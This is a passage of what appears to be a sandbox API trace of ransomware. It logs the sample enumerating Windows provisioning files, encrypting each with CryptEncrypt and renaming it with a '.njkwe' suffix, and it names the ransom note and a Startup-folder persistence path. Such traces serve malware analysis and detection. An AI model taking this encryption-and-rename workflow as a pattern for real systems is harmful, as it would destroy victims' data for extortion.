lpNewFilePointer=0xffffffff) returned 1 [0078.054] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x28a, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x28a, lpOverlapped=0x0) returned 1 [0078.054] GetProcessHeap () returned 0xbe0000 [0078.054] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0078.054] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.055] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0078.055] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0078.055] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0078.055] CloseHandle (hObject=0x43c) returned 1 [0078.055] GetProcessHeap () returned 0xbe0000 [0078.055] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0078.055] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\293__Connections_Cellular_Tele2 (Netherlands)_i1$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 183 [0078.055] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\293__Connections_Cellular_Tele2 (Netherlands)_i1$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\293__connections_cellular_tele2 (netherlands)_i1$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\293__Connections_Cellular_Tele2 (Netherlands)_i1$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\293__connections_cellular_tele2 (netherlands)_i1$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0078.056] GetProcessHeap () returned 0xbe0000 [0078.056] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0078.056] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90aecb6b, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90aecb6b, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90aecb6b, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2d5, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="294__Connections_Cellular_Telfort (Netherlands)_i0$(__MVID)@WAP.provxml", cAlternateFileName="294__C~1.PRO")) returned 1 [0078.056] lstrcmpiW (lpString1="294__Connections_Cellular_Telfort (Netherlands)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0078.056] lstrcmpiW (lpString1="294__Connections_Cellular_Telfort (Netherlands)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0078.056] lstrcmpiW (lpString1="294__Connections_Cellular_Telfort (Netherlands)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0078.056] lstrcmpiW (lpString1="294__Connections_Cellular_Telfort (Netherlands)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0078.056] lstrcmpiW (lpString1="294__Connections_Cellular_Telfort (Netherlands)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0078.056] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\294__Connections_Cellular_Telfort (Netherlands)_i0$(__MVID)@WAP.provxml") returned 165 [0078.056] StrStrIW (lpFirst="294__Connections_Cellular_Telfort (Netherlands)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0078.056] lstrcmpW (lpString1="294__Connections_Cellular_Telfort (Netherlands)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0078.056] lstrcmpW (lpString1="294__Connections_Cellular_Telfort (Netherlands)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0078.056] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\294__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0078.056] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\294__Connections_Cellular_Telfort (Netherlands)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\294__connections_cellular_telfort (netherlands)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0078.056] GetTickCount () returned 0x1153d82 [0078.056] GetTickCount () returned 0x1153d82 [0078.057] GetTickCount () returned 0x1153d82 [0078.057] GetTickCount () returned 0x1153d82 [0078.057] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0078.057] GetProcessHeap () returned 0xbe0000 [0078.057] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0078.057] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x2d5, lpOverlapped=0x0) returned 1 [0078.060] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd2b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.060] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x2d5, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x2d5, lpOverlapped=0x0) returned 1 [0078.060] GetProcessHeap () returned 0xbe0000 [0078.060] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0078.060] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.060] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0078.061] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0078.061] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0078.061] CloseHandle (hObject=0x43c) returned 1 [0078.061] GetProcessHeap () returned 0xbe0000 [0078.061] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0078.061] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\294__Connections_Cellular_Telfort (Netherlands)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 185 [0078.061] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\294__Connections_Cellular_Telfort (Netherlands)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\294__connections_cellular_telfort (netherlands)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\294__Connections_Cellular_Telfort (Netherlands)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\294__connections_cellular_telfort (netherlands)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0078.061] GetProcessHeap () returned 0xbe0000 [0078.061] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0078.062] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90aecb6b, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90aecb6b, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90aecb6b, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2d8, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="295__Connections_Cellular_Telfort (Netherlands)_i1$(__MVID)@WAP.provxml", cAlternateFileName="295__C~1.PRO")) returned 1 [0078.062] lstrcmpiW (lpString1="295__Connections_Cellular_Telfort (Netherlands)_i1$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0078.062] lstrcmpiW (lpString1="295__Connections_Cellular_Telfort (Netherlands)_i1$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0078.062] lstrcmpiW (lpString1="295__Connections_Cellular_Telfort (Netherlands)_i1$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0078.062] lstrcmpiW (lpString1="295__Connections_Cellular_Telfort (Netherlands)_i1$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0078.062] lstrcmpiW (lpString1="295__Connections_Cellular_Telfort (Netherlands)_i1$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0078.062] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\295__Connections_Cellular_Telfort (Netherlands)_i1$(__MVID)@WAP.provxml") returned 165 [0078.062] StrStrIW (lpFirst="295__Connections_Cellular_Telfort (Netherlands)_i1$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0078.062] lstrcmpW (lpString1="295__Connections_Cellular_Telfort (Netherlands)_i1$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0078.062] lstrcmpW (lpString1="295__Connections_Cellular_Telfort (Netherlands)_i1$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0078.062] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\295__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0078.062] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\295__Connections_Cellular_Telfort (Netherlands)_i1$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\295__connections_cellular_telfort (netherlands)_i1$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0078.062] GetTickCount () returned 0x1153d92 [0078.062] GetTickCount () returned 0x1153d92 [0078.062] GetTickCount () returned 0x1153d92 [0078.062] GetTickCount () returned 0x1153d92 [0078.062] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0078.062] GetProcessHeap () returned 0xbe0000 [0078.062] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0078.062] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x2d8, lpOverlapped=0x0) returned 1 [0078.064] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd28, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.064] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x2d8, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x2d8, lpOverlapped=0x0) returned 1 [0078.064] GetProcessHeap () returned 0xbe0000 [0078.064] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0078.064] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.065] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0078.065] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0078.065] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0078.065] CloseHandle (hObject=0x43c) returned 1 [0078.065] GetProcessHeap () returned 0xbe0000 [0078.065] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0078.065] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\295__Connections_Cellular_Telfort (Netherlands)_i1$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 185 [0078.065] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\295__Connections_Cellular_Telfort (Netherlands)_i1$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\295__connections_cellular_telfort (netherlands)_i1$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\295__Connections_Cellular_Telfort (Netherlands)_i1$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\295__connections_cellular_telfort (netherlands)_i1$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0078.066] GetProcessHeap () returned 0xbe0000 [0078.066] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0078.066] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90b12dd6, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90b12dd6, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90b12dd6, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2e0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="296__Connections_Cellular_Telfort (Netherlands)_i2$(__MVID)@WAP.provxml", cAlternateFileName="296__C~1.PRO")) returned 1 [0078.066] lstrcmpiW (lpString1="296__Connections_Cellular_Telfort (Netherlands)_i2$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0078.066] lstrcmpiW (lpString1="296__Connections_Cellular_Telfort (Netherlands)_i2$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0078.066] lstrcmpiW (lpString1="296__Connections_Cellular_Telfort (Netherlands)_i2$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0078.066] lstrcmpiW (lpString1="296__Connections_Cellular_Telfort (Netherlands)_i2$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0078.066] lstrcmpiW (lpString1="296__Connections_Cellular_Telfort (Netherlands)_i2$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0078.066] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\296__Connections_Cellular_Telfort (Netherlands)_i2$(__MVID)@WAP.provxml") returned 165 [0078.066] StrStrIW (lpFirst="296__Connections_Cellular_Telfort (Netherlands)_i2$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0078.066] lstrcmpW (lpString1="296__Connections_Cellular_Telfort (Netherlands)_i2$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0078.066] lstrcmpW (lpString1="296__Connections_Cellular_Telfort (Netherlands)_i2$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0078.066] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\296__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0078.066] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\296__Connections_Cellular_Telfort (Netherlands)_i2$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\296__connections_cellular_telfort (netherlands)_i2$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0078.066] GetTickCount () returned 0x1153d92 [0078.066] GetTickCount () returned 0x1153d92 [0078.066] GetTickCount () returned 0x1153d92 [0078.066] GetTickCount () returned 0x1153d92 [0078.066] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0078.067] GetProcessHeap () returned 0xbe0000 [0078.067] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0078.067] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x2e0, lpOverlapped=0x0) returned 1 [0078.068] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd20, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.068] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x2e0, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x2e0, lpOverlapped=0x0) returned 1 [0078.068] GetProcessHeap () returned 0xbe0000 [0078.068] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0078.068] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.069] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0078.069] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0078.069] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0078.069] CloseHandle (hObject=0x43c) returned 1 [0078.069] GetProcessHeap () returned 0xbe0000 [0078.069] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0078.069] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\296__Connections_Cellular_Telfort (Netherlands)_i2$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 185 [0078.069] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\296__Connections_Cellular_Telfort (Netherlands)_i2$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\296__connections_cellular_telfort (netherlands)_i2$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\296__Connections_Cellular_Telfort (Netherlands)_i2$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\296__connections_cellular_telfort (netherlands)_i2$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0078.070] GetProcessHeap () returned 0xbe0000 [0078.070] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0078.070] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90b12dd6, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90b12dd6, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90b12dd6, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2e7, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="297__Connections_Cellular_T-Mobile Netherlands (Netherlands)_i0$(__MVID)@WAP.provxml", cAlternateFileName="297__C~1.PRO")) returned 1 [0078.070] lstrcmpiW (lpString1="297__Connections_Cellular_T-Mobile Netherlands (Netherlands)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0078.070] lstrcmpiW (lpString1="297__Connections_Cellular_T-Mobile Netherlands (Netherlands)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0078.070] lstrcmpiW (lpString1="297__Connections_Cellular_T-Mobile Netherlands (Netherlands)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0078.070] lstrcmpiW (lpString1="297__Connections_Cellular_T-Mobile Netherlands (Netherlands)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0078.070] lstrcmpiW (lpString1="297__Connections_Cellular_T-Mobile Netherlands (Netherlands)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0078.070] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\297__Connections_Cellular_T-Mobile Netherlands (Netherlands)_i0$(__MVID)@WAP.provxml") returned 178 [0078.070] StrStrIW (lpFirst="297__Connections_Cellular_T-Mobile Netherlands (Netherlands)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0078.070] lstrcmpW (lpString1="297__Connections_Cellular_T-Mobile Netherlands (Netherlands)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0078.070] lstrcmpW (lpString1="297__Connections_Cellular_T-Mobile Netherlands (Netherlands)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0078.070] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\297__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0078.070] CreateFileW 